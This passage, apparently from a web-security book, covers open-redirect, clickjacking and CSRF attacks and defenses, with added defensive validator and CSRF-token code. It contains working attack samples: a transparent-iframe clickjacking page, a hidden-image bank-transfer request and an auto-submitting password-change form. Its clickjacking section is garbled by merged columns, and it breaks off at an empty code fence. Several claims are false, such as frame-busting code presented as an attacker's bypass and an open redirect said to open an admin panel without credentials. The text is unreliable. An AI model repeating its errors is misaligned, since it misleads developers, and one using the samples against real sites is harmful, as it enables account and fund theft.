• Example:

https://website-vulnerable.com/redirect?url=https://legitimate-site.com?url=https://malicious-site.com
3. Client-side attacks

- Objective: Exploit client-side vulnerabilities to bypass open redirection protection.
- Techniques:
1. XSS (Cross-Site Scripting): Inject JavaScript code to perform the redirection from the user's browser.
2. DOM manipulation: Modify web page content to change the redirection destination.
- Example:

JavaScript

<script>
window.location.href = "https://malicious-site.com";
</script>

4. Open redirects in subdomains

- Objective: To exploit trust in subdomains controlled by the attacker.
- Technique: Register a subdomain on the vulnerable site and use it to redirect users.
- Example:

https://website-vulnerable.com/redirect?url=https://subdomain-attacker.site-vulnerable.com

Defenses against open redirection protection evasion

- Domain whitelisting: Allow redirects only to specific and trusted domains.
- Strict URL validation: Implement stringent validation of the destination URL, including checking for special characters and URL normalization.
- Use of CSRF tokens: Use CSRF tokens to protect redirect requests.
- XSS protection: Prevent injection of JavaScript code that can perform malicious redirects.
- Monitoring and logging: Log all redirect requests to detect suspicious patterns.

By understanding evasion techniques and strengthening defenses, web developers and administrators can better protect their users from the risks associated with open redirect vulnerabilities.

Escalating the attack

Open redirect vulnerabilities are often considered low risk, but they can be escalated into more sophisticated and dangerous attacks. This chapter explores how attackers can exploit open redirects to carry out phishing, credential theft, security bypass and other advanced attacks.

1. Phishing and Credential Theft

- Goal: Trick users into revealing sensitive information.
- Technique: Create an open redirect URL that looks legitimate and directs users to a fake website that mimics the original.
- Example:

https://sitio-legitimo.com/redirect?url=https://sitio-falso.com/login

An attacker could send this URL to a user, making them believe they are being redirected to the legitimate login page.

2. Security Bypass

- Objective: To bypass security filters and access controls.
- Technique: Use an open redirect to access internal or restricted resources that would not normally be available.
- Example:

https://sitio-corporativo.com/redirect?url=https://sitio-corporativo.com/admin

An attacker could use this URL to access the corporate site's administration panel, even if they do not have valid credentials.

3. CSRF (Cross-Site Request Forgery) Attacks

- Objective: Perform unauthorized actions on behalf of a user.
- Technique: Combine an open redirect with a CSRF attack
to trick the user's browser into executing malicious actions on a logged-in website.
- Example:

An attacker could send an open redirect link to a user that contains a hidden CSRF attack. Upon clicking the link, the user's browser would be redirected to a legitimate web site, but the CSRF attack would run in the background, performing unauthorized actions without the user's knowledge.

4. Clickjacking attacks

- Objective: Trick users into clicking on invisible or disguised elements.
- Technique: Use an open redirect to load a malicious web page in an invisible iframe over a legitimate page.
- Example:

An attacker could create a web page containing an invisible button over a legitimate link. Upon clicking the link, the user would be redirected to another page, but the invisible button would also be clicked, performing some malicious action without the user's knowledge.

5. XSS (Cross-Site Scripting) Attack Amplification

- Objective: To increase the impact of an XSS attack.
- Technique: Use an open redirect to redirect users to a page containing a malicious XSS script.
- Example:

https://sitio-vulnerable.com/redirect?url=https://sitio-atacante.com/xss.js

An attacker could inject this URL into an XSS-vulnerable website. When a user visits the injected page, their browser would be redirected to the attacker's page, where the XSS script would be executed.

Defenses against Open Redirect Escalation

- URL validation: Implement strict validation of all redirect URLs to ensure that they only point to allowed domains and paths.
- Whitelist: Maintain a whitelist of allowed redirect URLs and block all others.
- User warnings: Display clear warnings to users before redirecting them to an external site.
- CSRF tokens: Use CSRF tokens to protect against CSRF attacks.
- X-Frame-Options: Use the X-Frame-Options header to prevent clickjacking attacks.
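The PHP validation at the end of the prevention section, the evasion techniques (percent-encoding, special characters, redirect chains, attacker-controlled subdomains) and the defenses listed above all come down to one question: is the parsed destination host on the whitelist? The following is an added example, not code from the book, of a whitelist-based redirect validator written for Node.js using the built-in URL parser; the host names, parameter names and test inputs are constructed.

```javascript
// Added example (not from the book): a whitelist-based open redirect validator.
// Uses the WHATWG URL parser that Node.js provides as a global. Host names
// and parameter names below are constructed for the demonstration.

// Exact hosts we are willing to redirect to (no wildcard subdomains, so an
// attacker-registered subdomain of our site is not accepted either).
const ALLOWED_HOSTS = new Set(['legitimate-site.com', 'www.legitimate-site.com']);

// Parameter names whose presence in the target suggests a redirect chain.
const CHAIN_PARAMS = ['url', 'redirect', 'next', 'return', 'redir'];

// Returns the absolute URL to redirect to, or null when the input is rejected.
function safeRedirectTarget(raw, requestOrigin = 'https://legitimate-site.com') {
  if (typeof raw !== 'string' || raw.trim() === '') return null;

  // Reject whitespace and control characters before parsing: the URL parser
  // silently strips tabs and newlines, which other components may not.
  if (/[\s\x00-\x1f\x7f]/.test(raw)) return null;

  let target;
  try {
    // Resolving against our own origin turns a relative path ("/dashboard")
    // into an absolute URL, and turns "//malicious.com" into
    // "https://malicious.com", which is then judged by host like any other.
    target = new URL(raw, requestOrigin);
  } catch (e) {
    return null; // unparsable input is rejected, never passed through
  }

  // Only http(s): this excludes javascript:, data: and other schemes.
  if (target.protocol !== 'https:' && target.protocol !== 'http:') return null;

  // Compare the parsed host, not a string prefix. A regex anchored only at
  // the start would accept "https://legitimate-site.com.evil.com"; userinfo
  // such as "https://legitimate-site.com@evil.com" is also parsed correctly.
  if (!ALLOWED_HOSTS.has(target.hostname.toLowerCase())) return null;
  if (target.username || target.password) return null;

  // Refuse redirect chains: a whitelisted target that itself carries a
  // redirect parameter pointing off-site is rejected recursively.
  for (const name of CHAIN_PARAMS) {
    const nested = target.searchParams.get(name);
    if (nested !== null && safeRedirectTarget(nested, requestOrigin) === null) return null;
  }
  return target.toString();
}
```

The decoded value of a nested parameter is checked with the same function, so percent-encoded and protocol-relative nested values are treated exactly like top-level ones.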
2.4 - CLICKJACKING

Clickjacking is a vulnerability in which an attacker tricks users into clicking on invisible or disguised web elements, such as buttons or links, without them realizing it. This type of attack can have serious consequences, such as disclosing personal information, performing unwanted actions or compromising system security.

Understanding Clickjacking

Clickjacking works by placing a transparent page or web element over another page that the user considers legitimate. In this way, when the user tries to interact with the visible page, they are actually interacting with the hidden page or hidden elements.

Real-life examples of Clickjacking

Let's explore some real examples to understand how clickjacking works and the risks it can entail.

Example 1: Clickjacking on a Social Media "Like" Button

Imagine a web page that has a Facebook "Like" button. An attacker could create a malicious page that loads the legitimate Facebook page in a transparent iframe, positioning the "Like" button just below the user's cursor. The user thinks they are clicking on a visible link or button on the malicious page, but they are actually clicking on the Facebook "Like" button.

----------------
<html>
<head>
<style>
iframe {
  opacity: 0; /* Makes the iframe transparent */
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
</style>
</head>
<body>
<h1>Click here to win a prize!</h1>
<iframe src="https://www.facebook.com/like_button_page"></iframe>
</body>
</html>
----------------

Example 2: Clickjacking on a Security Settings Page

Consider a bank account web page that has a button to change security settings, such as enabling or disabling two-factor authentication (2FA). An attacker could load this page in a transparent iframe over a page with a fake appeal, such as a personality quiz or online game. When the user thinks they are interacting with the quiz or game, they are actually disabling 2FA on their bank account.

Example 3: Clickjacking on a Payment Form

A malicious website could load a legitimate merchant's payment form in a transparent iframe over a game or survey. Users think they are interacting with the game or survey, but are actually entering their credit card information into the payment form.

Risks and Consequences

Clickjacking can lead to several serious consequences:

1. Disclosure of Personal Information: Users can be tricked into divulging sensitive information, such as passwords, credit card numbers, and other personal data.
2. Unwanted Actions: Users can perform actions on their own behalf without their consent, such as posting on social networks, sending emails, or changing security settings.
3. Compromise of System Security: Attackers can disable security features, such as two-factor authentication, further compromising user security.
Clickjacking Prevention

To prevent clickjacking, web developers should implement the following measures:

• HTTP Security Headers: Use the X-Frame-Options or Content-Security-Policy (CSP) headers to control whether a page can be loaded in an iframe.
  • X-Frame-Options: DENY prevents the page from loading in any iframe.
  • X-Frame-Options: SAMEORIGIN allows the page to load in an iframe only if the origin is the same.
  • The CSP policy can specify more complex rules for iframes.

• Frame Busting: Implement JavaScript techniques to prevent your page from being loaded in an iframe. For example:

----------------
if (window.top !== window.self) {
  window.top.location = window.self.location;
}
----------------

• User Interface Design: Design user interfaces that are less susceptible to clickjacking attacks, such as avoiding excessive use of iframes and improving the visibility of critical actions.

Clickjacking is a serious vulnerability that can lead to devastating consequences if not handled properly. Understanding how it works and learning from real-world examples can help protect your web applications and your users. Implement security headers, frame busting techniques, and design secure user interfaces to mitigate the risks associated with clickjacking.
3. Exploiting Clickjacking Vulnerabilities
Advanced search
• Objective: To demonstrate how an attacker can
Clickjacking, also known as click hijacking, is a malicious exploit a clickjacking vulnerability.
technique in which an attacker tricks a user into clicking on a • Techniques:
visible element on a web page, while actually interacting with a 1. Create a malicious page: Design a web page that
hidden or transparent element in an overlay. This chapter explores how to identify and exploit clickjacking vulnerabilities.

1. Understanding Clickjacking

• Objective: To become familiar with the basic concepts of clickjacking and its different variants.
• Types of Clickjacking:
1. Classic Clickjacking: The attacker superimposes a transparent iframe over a legitimate button.
2. Likejacking: The attacker tricks the user into clicking the Facebook "Like" button.
3. Cursorjacking: The attacker manipulates the mouse cursor to point to an element other than the one the user thinks he/she is clicking.
• Impact: Theft of credentials, disclosure of confidential information, installation of malware, execution of unwanted actions.

2. Identifying Clickjacking Vulnerabilities

• Objective: To find web pages susceptible to clickjacking attacks.
• Tools:
1. Manual inspection: Examine the source code of the page for iframes and overlapping layers.
2. Browser extensions: Use extensions such as "Clickjacking Test" to detect possible vulnerabilities.
3. Vulnerability scanners: Employ tools such as OWASP ZAP to automatically identify clickjacking vulnerabilities.
• Example: Analyze the source code of a web page and discover a hidden iframe that loads an external site.

… overlays a transparent iframe over a legitimate button on another page.
2. Luring the user: Using social engineering to lure the user to the malicious page (e.g. through a misleading link).
3. Trick the user: Make the user click on the visible button, which will actually activate the hidden button in the iframe.
• Example: Create a malicious page that overlays a transparent iframe over the "Buy Now" button of an e-commerce site, replacing it with a "Win a prize" button.

4. Mitigating Clickjacking

• Objective: To protect web pages against clickjacking attacks.
• Techniques:
1. X-Frame-Options: Configure this HTTP header to control whether a page can be embedded in an iframe.
2. Content Security Policy (CSP): Use CSP policies to restrict the loading of external content and prevent the embedding of unauthorized iframes.
3. Framebusting: Implement scripts that detect if a page is being loaded in an iframe and break the frame.
• Example: Set the X-Frame-Options header to "DENY" to prevent a page from being embedded in an iframe.

5. Clickjacking on Mobile Devices

• Objective: To understand how clickjacking can affect mobile device users.
• Challenges: Touch screens make it more difficult for users to detect transparent overlays.
• Mitigation: Apply the same mitigation techniques as for desktop browsers, in addition to considering responsive design and user experience on mobile devices.
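The header-based mitigations listed above can be checked mechanically when auditing a site's responses. The following Python is an added example, not code from the book: it classifies a response's framing protection from its X-Frame-Options and Content-Security-Policy headers (CSP frame-ancestors takes precedence when both are present), flags the permissive `frame-ancestors *.domain-attacker.com` pattern that the next chapter shows, and returns the hardened header pair matching the "DENY" example. The header sets it evaluates are constructed for the demonstration.

```python
"""Audit HTTP response headers for clickjacking (framing) protection.

Added example, not the book's code. The header sets in SAMPLE_RESPONSES are
constructed for the demonstration; the rules follow the X-Frame-Options and
CSP frame-ancestors semantics.
"""
from typing import Dict, List, Optional, Tuple

# Source expressions that do not let a third-party origin frame the page.
SAFE_ANCESTOR_SOURCES = {"'none'", "'self'"}


def parse_frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list, or None if the directive is absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return parts[1:]
    return None


def assess_framing(headers: Dict[str, str]) -> Tuple[str, str]:
    """Classify a response as protected, permissive or unprotected against framing.

    CSP frame-ancestors overrides X-Frame-Options when both are present, so it
    is evaluated first; X-Frame-Options is only consulted when CSP says nothing
    about framing.
    """
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy")
    if csp is not None:
        ancestors = parse_frame_ancestors(csp)
        if ancestors is not None:
            if ancestors and all(a.lower() in SAFE_ANCESTOR_SOURCES for a in ancestors):
                return "protected", f"CSP frame-ancestors {' '.join(ancestors)}"
            shown = " ".join(ancestors) or "(empty)"
            return "permissive", f"CSP frame-ancestors admits other origins: {shown}"
    xfo = h.get("x-frame-options")
    if xfo is not None:
        value = xfo.strip().upper()
        if value in ("DENY", "SAMEORIGIN"):
            return "protected", f"X-Frame-Options {value}"
        if value.startswith("ALLOW-FROM"):
            return "unprotected", "X-Frame-Options ALLOW-FROM is obsolete; current browsers ignore it"
        return "unprotected", f"X-Frame-Options value {xfo!r} is not recognised and is ignored"
    return "unprotected", "neither X-Frame-Options nor CSP frame-ancestors is set"


def hardened_headers() -> Dict[str, str]:
    """Headers that deny all framing, as in the chapter's DENY example."""
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }


# Constructed header sets, not captured from any real site.
SAMPLE_RESPONSES = {
    "no-headers": {"Content-Type": "text/html"},
    "xfo-deny": {"X-Frame-Options": "DENY"},
    "csp-wildcard-subdomain": {
        "Content-Security-Policy": "default-src 'self'; frame-ancestors *.domain-attacker.com"
    },
    "csp-overrides-xfo": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *"},
}


def audit(responses: Dict[str, Dict[str, str]] = SAMPLE_RESPONSES) -> Dict[str, str]:
    """Verdict per named response."""
    return {name: assess_framing(hdrs)[0] for name, hdrs in responses.items()}


if __name__ == "__main__":
    for name, hdrs in SAMPLE_RESPONSES.items():
        verdict, reason = assess_framing(hdrs)
        print(f"{name}: {verdict} ({reason})")
```

The "csp-overrides-xfo" case is the one to watch in practice: a DENY header looks reassuring, but a later CSP `frame-ancestors *` silently reopens framing in every browser that supports CSP level 2.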

64 MILLIONAIRE RECORDS
Overcoming protection

Attackers can employ a variety of techniques to circumvent clickjacking protections and carry out their attacks. This chapter delves into these techniques and mitigation strategies.

1. Bypassing X-Frame-Options

• X-Frame-Options: An HTTP header that tells the browser whether to allow a page to be displayed in an iframe.
• Avoidance Techniques:
1. Frame Busting: Inject JavaScript code into the victim website to break the iframe.
2. Nested iframes: Use nested iframes to bypass X-Frame-Options protection.
3. Clickjacking on Vulnerable Sites: Search for websites that do not correctly implement X-Frame-Options.
• Example (Frame Busting):

JavaScript

--------------
<script>
// If this document is not the top-level window, navigate the top window to it
if (top != self) {
    top.location.href = self.location.href;
}
</script>
--------------

2. Bypassing Content Security Policy (CSP)

• CSP: It is an additional layer of security that allows you to control which resources can be loaded on a page.
• Avoidance Techniques:
1. Social Engineering: Tricking the user into clicking on a malicious link that leads to a vulnerable page.
2. Attacks on Third-Party Sites: Search for XSS vulnerabilities in third-party websites that load on the target site.
3. Use of Subdomains: Hosting malicious content on a subdomain of the target site that is not protected by CSP.
• Example (CSP Unsecured):

--------------
Content-Security-Policy: frame-ancestors *.domain-attacker.com
--------------

3. Hybrid Attacks

• Combination of Techniques: Attackers can combine Clickjacking with other vulnerabilities, such as XSS or CSRF, to increase the impact of their attacks.
• Example: Injecting an XSS script into a vulnerable site and then performing a Clickjacking attack to trick the user into performing unwanted actions.

4. Clickjacking on Mobile Devices

• Additional Challenges: The smaller screens and touch interaction of mobile devices present unique challenges for Clickjacking.
• Avoidance Techniques:
1. Transparent Overlay: Overlay a transparent iframe over legitimate user interface elements.
2. Gesture Manipulation: Hijacking touch gestures to perform unwanted actions.

Clickjacking Mitigation

• X-Frame-Options: Configure this header properly to prevent the site from displaying in iframes.
• Content Security Policy (CSP): Implement a strict CSP policy to control resource load.
• Frame Busting: Use scripts to break iframes and redirect the user to the main page.
• User Awareness: Educate users about the risks of Clickjacking and how to identify it.

Advanced Examples

• Social Media Clickjacking: Tricking users into posting unwanted content or following malicious accounts.
• Clickjacking in Web Applications: Exploiting vulnerabilities in web applications to perform unauthorized actions.
web vulnerabilities 65
Escalating the attack

While a basic clickjacking attack may seem trivial, attackers can escalate this technique to achieve more damaging targets. This chapter explores how clickjackers can take their attacks to the next level and the defenses that can be implemented.

1. Basic Clickjacking: The Initial Deception

• Objective: To induce the user to click on an element that was not intended.
• Technique: Superimpose an invisible frame (iframe) over a legitimate page and place interactive elements (buttons, links) so that they align with the visible elements of the original page.
• Example

HTML

--------------
<div style="position:relative;">
<iframe src="http://legitimate-site.com" style="width:500px;height:300px;"></iframe>
<button style="position:absolute;top:50px;left:100px;">Click here to win!</button>
</div>
--------------

2. Clickjacking Escalation: Beyond the Click

• Credential Theft: Using clickjacking to trick users into entering their credentials into a fake form superimposed over a legitimate login page.
• Configuration Changes: Inducing users to change their account settings (e.g., enabling remote access) without their knowledge.
• Unwanted Posting: Tricking users into posting unwanted content on their social networks or performing actions on other platforms.
• Malware Installation: Hiding a malware download link under a seemingly harmless button.
• Likejacking: Tricking users into clicking "Like" on Facebook pages without their consent.
• Cursorjacking: Manipulate the mouse cursor so that the user clicks in a different place than intended.

3. Advanced Clickjacking Techniques

• Clickjacking Combined with XSS: Using an XSS vulnerability to inject code that performs a clickjacking attack, making it difficult to detect.
• Clickjacking on Mobile Devices: Adapt the technique to take advantage of the specific characteristics of touch screens.
• Clickjacking in Rich Web Applications: Exploiting the complex interactions of web applications to perform more sophisticated attacks.

4. Clickjacking Defenses

• X-Frame-Options: Configure this HTTP header to control whether a page can be embedded in an iframe.
• Content Security Policy (CSP): Define a security policy that restricts the loading of content from other domains.
• Framebusting Scripts: Use JavaScript to detect if a page is being embedded in an iframe and take action (e.g. redirect the user).
• User Awareness: Educate users about clickjacking and how to recognize it.

Example of Escalated Clickjacking Attack

An attacker could create a web page that looks like a harmless online game. However, this page would contain an invisible iframe superimposed over a bank transfer form from a legitimate website. By clicking on the game buttons, the user would unknowingly be transferring money from his or her bank account.
2.5 - CROSS-SITE REQUEST FORGERY #2.5

Cross-Site Request Forgery (CSRF) is a type of web security vulnerability that allows an attacker to induce users to perform unwanted actions on a web application to which they are authenticated. It is a dangerous vulnerability because it exploits the trust that a website has in a user's browser.

Understanding CSRF

A CSRF attack occurs when an authenticated user in a web application is tricked into performing an unwanted action in that application, without the user's consent. The attacker exploits the user's active session and sends malicious requests on the user's behalf, without the user's knowledge.

Real-life examples of CSRF

Let's explore some real-world examples to understand how CSRF works and the risks it can entail.

Example 1: Transferring Money in an Online Banking System

Imagine an online banking system where users can transfer money to other accounts. An attacker can create a malicious HTML page that, when loaded by an authenticated user, sends a request to transfer money from the user's account to the attacker's account.

--------------
<!DOCTYPE html>
<html>
<body>
<h1>Click here to win a prize!</h1>
<img src="http://example-bank.com/transfer?amount=1000&to_account=attacker_account" style="display:none;">
</body>
</html>
--------------

In this example, when the authenticated user loads the malicious page, the browser automatically sends a GET request to the wire transfer URL. Since the user is already authenticated, the request is made with the user's active session and the money is transferred to the attacker's account.

Example 2: Password Change in a User Account

Consider a website that allows users to change their password. An attacker can create a hidden form that, when submitted, changes the user's password to a password controlled by the attacker.

--------------
<!DOCTYPE html>
<html>
<body>
<h1>Click here to watch a funny video!</h1>
<form action="http://example-website.com/change_password" method="POST" style="display:none;">
<input type="hidden" name="new_password" value="new_attacker_password">
<input type="hidden" name="confirm_password" value="new_attacker_password">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
--------------

In this case, when the authenticated user loads the malicious page, the hidden form is automatically submitted, changing the user's password to one that the attacker controls.

Risks and Consequences

CSRF attacks can have several serious consequences:

1. Unauthorized Transfer of Funds: As seen in the online banking example, the attacker can transfer money from the user's account to his own account.
2. Changing Critical Settings: The attacker can change important settings in the user's account, such as the password, email address, or security preferences.
3. Performing Malicious Actions: The attacker can perform other unwanted actions on behalf of the user, such as posting unwanted content on social networks or sending messages from the user's account.
CSRF Prevention

To prevent CSRF attacks, web developers should implement the following measures:

1. CSRF Tokens: Use unique and random tokens for each request that modifies the state of the server. These tokens must be included in the forms and verified on the server before processing the request.

--------------
<form action="/change_password" method="POST">
<!-- value is the per-session token issued by the server -->
<input type="hidden" name="csrf_token" value="random_token">
<!-- Other form fields -->
</form>
--------------

2. Referer and Origin headers: Check the HTTP Referer and Origin headers to ensure that the requests come from trusted sources.

--------------
// PHP example: check the Origin header, falling back to the origin of the Referer
$expected = 'https://example-website.com';
$origin = $_SERVER['HTTP_ORIGIN'] ?? null;
if ($origin === null && isset($_SERVER['HTTP_REFERER'])) {
    $r = parse_url($_SERVER['HTTP_REFERER']);
    $origin = ($r['scheme'] ?? '') . '://' . ($r['host'] ?? '');
}
if ($origin !== $expected) {
    die('Unauthorized request');
}
--------------

3. SameSite Cookies: Set session cookies with the SameSite attribute to prevent them from being sent in cross-origin requests.

--------------
Set-Cookie: sessionid=abc123; SameSite=Strict; Secure; HttpOnly
--------------

CSRF is a critical vulnerability that can lead to serious consequences if not handled properly. By understanding how it works and learning from real-world examples, you can better protect your web applications and your users. Implement CSRF tokens, verify HTTP headers and configure session cookies correctly to mitigate the risks associated with CSRF.
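The three measures above fit together into one server-side check. The following Python is an added example, not the book's code: it issues a per-session synchronizer token, verifies a state-changing request by requiring both a matching Origin (or Referer origin) and a token that equals the one stored in the session, rotates the token after use, and emits the Set-Cookie value from the chapter. The session store is a plain dict standing in for a real server-side session, the origin `https://example-website.com` is taken from the chapter, and the requests in `demo()` are constructed.

```python
"""Server-side CSRF defences: synchronizer tokens, origin verification and a
SameSite session cookie.

Added example, not the book's code. `session` is a dict standing in for a
server-side session store; requests are simplified to dicts of headers and
form fields.
"""
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlsplit

SITE_ORIGIN = "https://example-website.com"  # the application's own origin (from the chapter)


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create a fresh random token, store it in the session and return it.

    The caller renders the token into the form as the hidden csrf_token field.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """scheme://host[:port] from the Origin header, falling back to the Referer."""
    h = {k.lower(): v for k, v in headers.items()}
    src = h.get("origin") or h.get("referer")
    if not src:
        return None
    parts = urlsplit(src)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def verify_state_changing_request(session: Dict[str, str], headers: Dict[str, str],
                                  form: Dict[str, str]) -> bool:
    """Accept a POST only if the origin matches and the token is the session's.

    Both checks must pass. The token comparison is constant-time so a wrong
    token cannot be distinguished from a right one by response timing, and
    the token is rotated after a successful check so it cannot be replayed.
    """
    if request_origin(headers) != SITE_ORIGIN:
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    session["csrf_token"] = secrets.token_urlsafe(32)
    return True


def session_cookie(session_id: str) -> str:
    """Set-Cookie value with the attributes the chapter recommends."""
    return f"sessionid={session_id}; SameSite=Strict; Secure; HttpOnly; Path=/"


def demo() -> Dict[str, bool]:
    """Constructed requests: a genuine password change and a forged cross-site post."""
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    legitimate = verify_state_changing_request(
        session,
        {"Origin": SITE_ORIGIN},
        {"new_password": "x", "confirm_password": "x", "csrf_token": token},
    )
    forged = verify_state_changing_request(
        session,
        {"Origin": "https://attacker.example", "Referer": "https://attacker.example/video.html"},
        {"new_password": "attacker", "confirm_password": "attacker"},  # no token available to the attacker
    )
    return {"legitimate": legitimate, "forged": forged}


if __name__ == "__main__":
    print(demo())
    print(session_cookie("abc123"))
```

The forged request in `demo()` is exactly the hidden-form page from Example 2: it fails twice over, because the browser reports the attacker's origin and because the attacker's page cannot read the token out of the victim's session.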
Advanced search

CSRF is a type of attack that tricks an authenticated user into performing unwanted actions on a web application to which they are logged in. This chapter delves into the techniques and tools used to identify and exploit CSRF vulnerabilities, as well as key defensive measures.

1. Understanding CSRF

• How it works: An attacker sends a malicious link or form to the victim, who, upon clicking or interacting with it, unknowingly sends a request to the vulnerable web application. The application processes the request as if it came from the legitimate user, which can lead to unauthorized changes to data or settings.
• Example: An attacker sends a link to the victim that looks harmless, but actually contains a hidden request to transfer money from the victim's bank account to the attacker.

2. Identifying CSRF Vulnerabilities

• Manual Analysis: Examine the source code and application behavior for requests that do not properly verify the origin of the request or lack anti-CSRF tokens.
• Automated Tools:
1. Vulnerability Scanners: Burp Suite, OWASP ZAP: Can automatically detect possible CSRF vulnerabilities in a web application.
2. Browser Extensions: CSRF Tester, Tamper Data: Allow you to modify and resend requests to test for the presence of CSRF.

Example: Using Burp Suite to intercept and modify a legitimate request, removing or modifying the anti-CSRF token, to verify if the application is vulnerable.

3. Exploiting CSRF Vulnerabilities

• Creation of Malicious Payloads: Generate links, forms or JavaScript code that, when executed by the victim, send the malicious request to the vulnerable application.
• Link-Based Attacks: Sending malicious links via email, instant messages or social networks, enticing the victim to click on them.
• Form-Based Attacks: Inserting hidden forms in websites that the victim visits frequently, taking advantage of the browser's autocomplete function to send unauthorized requests.
• JavaScript-based attacks: Injecting malicious JavaScript code into legitimate websites that the victim visits to send CSRF requests without their direct interaction.

Example: Create a hidden form on a popular website that, when loaded, sends a request to change the email address associated with the victim's account in another vulnerable application.

4. Defensive Measures against CSRF

• Anti-CSRF tokens: Generate unique and unpredictable tokens for each request and verify their validity on the server side.
• Verification of the Request Origin (Origin Header): Ensure that the requests come from the same origin (domain, port, protocol) as the web application.
• SameSite Cookies: Set cookies with the SameSite attribute to restrict their delivery in cross-origin requests.
• CSRF Protection in Web Frameworks: Many web frameworks offer built-in CSRF protection mechanisms.
• Example: Implement an anti-CSRF token in a password change form, so that each time the form is loaded, a new token is generated and its validity is checked when the request is submitted.

Additional Considerations

• CSRF in APIs: RESTful APIs can also be vulnerable to CSRF if appropriate protection measures are not implemented.
• CSRF in Single Page Applications (SPA): SPAs may require specific CSRF mitigation strategies due to their dynamic nature.
Bypass protection

CSRF protection mechanisms are designed to prevent these attacks, but clever attackers often find ways to evade them. This chapter explores the techniques and strategies attackers use to circumvent CSRF protections and how developers can strengthen their defenses.

1. Weak or Predictable CSRF Tokens

• Problem: If CSRF tokens are easy to guess or predict, attackers can spoof valid requests.
• Examples:
1. Tokens based on simple patterns (e.g., numerical sequences).
2. Tokens that do not change frequently enough.
3. Tokens stored in insecure locations (e.g., cookies without the HttpOnly attribute).
• Solution:
1. Generate cryptographically secure and random CSRF tokens.
2. Change tokens with each request or session.
3. Store tokens on the server side (e.g., in the user's session).

2. Referer Header Spoofing

• Problem: Some CSRF protection mechanisms rely on the Referer header to verify the origin of the request. Attackers can spoof this header.
• Example:
1. An attacker can send a CSRF request from his own website and set the Referer header to match the destination website.
• Solution:
1. Do not rely solely on the Referer header.
2. Combine the Referer header with other CSRF protection mechanisms, such as tokens.

3. JSON CSRF with HTTP GET Verbs

• Problem: Some websites accept JSON requests via the HTTP GET verb, which facilitates CSRF attacks, as attackers can include the JSON payload in the URL.
• Example:
1. An attacker can create a malicious link that, when clicked, sends a GET request with malicious JSON data.
• Solution:
1. Do not accept JSON requests via GET.
2. Use HTTP POST verbs for requests that modify data.

4. CSRF Flash Attacks

• Issue: Adobe Flash had a vulnerability that allowed attackers to bypass CSRF protections by manipulating Flash policy files (crossdomain.xml).
• Solution:
1. Flash is no longer supported by most browsers, which mitigates this issue.
2. Ensure that Flash policy files are configured correctly to restrict cross-domain access.

5. XSS Based Attacks

• Problem: If a website is vulnerable to XSS, an attacker can inject a malicious script that makes CSRF requests on behalf of the user.
• Solution:
1. Protecting against XSS is critical to prevent XSS-based CSRF attacks.
2. Implement a content security policy (CSP) to restrict script execution.

6. Social Engineering

• Problem: Attackers can use social engineering techniques to trick users into clicking on malicious links or performing actions that trigger CSRF attacks.
• Solution:
1. Educate users about CSRF risks and how to identify suspicious links and emails.

CSRF Protection Best Practices

• Use cryptographically secure and random CSRF tokens.
• Change tokens with each request or session.
• Store tokens on the server side.
• Do not rely solely on the Referer header.
• Do not accept JSON requests via GET.
• Protect against XSS.
• Educate users about CSRF risks.

Escalating the attack

Cross-Site Request Forgery (CSRF) attacks are a significant threat to web applications, as they allow attackers to perform unauthorized actions on behalf of a legitimate user. This chapter dives into advanced techniques that attackers can use to escalate their CSRF attacks and cause greater impact.

1. Flash CSRF

• Objective: Exploit Adobe Flash functionality to bypass some traditional CSRF protections.
• Technique: Flash SWF files can make HTTP requests without being subject to the same-origin policy, allowing attackers to send CSRF requests from different domains.
• Mitigation: Disable Flash or restrict its access to specific domains.

2. JSON CSRF

• Objective: Exploit web applications that accept data in JSON format.
• Technique: Attackers can create forms or scripts that send POST requests with malicious JSON data to the vulnerable application.
• Mitigation: Implement CSRF tokens in JSON requests and validate the content type of the requests.

3. Partial Page CSRF

• Objective: Attack web applications that use AJAX to load dynamic content.
• Technique: Attackers can send CSRF requests that target specific AJAX endpoints, which can result in unauthorized page changes.
• Mitigation: Protect AJAX endpoints with CSRF tokens and validate requests.

4. Header-Based CSRF

• Objective: Evade CSRF protections that focus on form parameters or the request body.
• Technique: Attackers can inject malicious CSRF tokens into custom HTTP headers, such as Referer or X-Requested-With.
• Mitigation: Validate CSRF tokens in all possible locations, including HTTP headers.

5. Supply Chain CSRF

• Objective: Attack web applications through CSRF vulnerabilities in libraries or third-party components they use.
• Technique: Attackers can inject malicious code into a third-party library or component that is then included in the targeted web application.
• Mitigation: Keep libraries and components up to date, and audit third-party code for CSRF vulnerabilities.

6. CSRF Combined with Other Vulnerabilities

• Objective: Increase the impact of a CSRF attack by combining it with other vulnerabilities, such as XSS or SQL injection.
• Technique: Attackers can use CSRF to inject malicious code that exploits other vulnerabilities in the application.
• Mitigation: Implement a layered defense against multiple vulnerabilities, including CSRF, XSS and SQL injection.

Advanced CSRF Defenses

• Robust CSRF tokens: Use unpredictable and unique CSRF tokens for each user and session.
• Double Submit Cookies: Submit the CSRF token in both a cookie and a form parameter.
• Strict Validation: Validate the origin of the request, the CSRF token and other relevant parameters.
• SameSite Cookies: Configure cookies with the SameSite attribute to restrict their delivery in cross-site requests.
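The "Double Submit Cookies" defense listed above is worth seeing in its signed form, because the naive version (any cookie value that equals the form value) can be defeated by an attacker who is able to plant a cookie on the victim's browser. The following Python is an added example, not the book's code: the cookie carries a random nonce plus an HMAC over the nonce and the session id under a server secret, the form must echo the same value, and the server verifies both the equality and the MAC without storing anything per request. The session ids and the `SERVER_SECRET` are constructed for the demonstration.

```python
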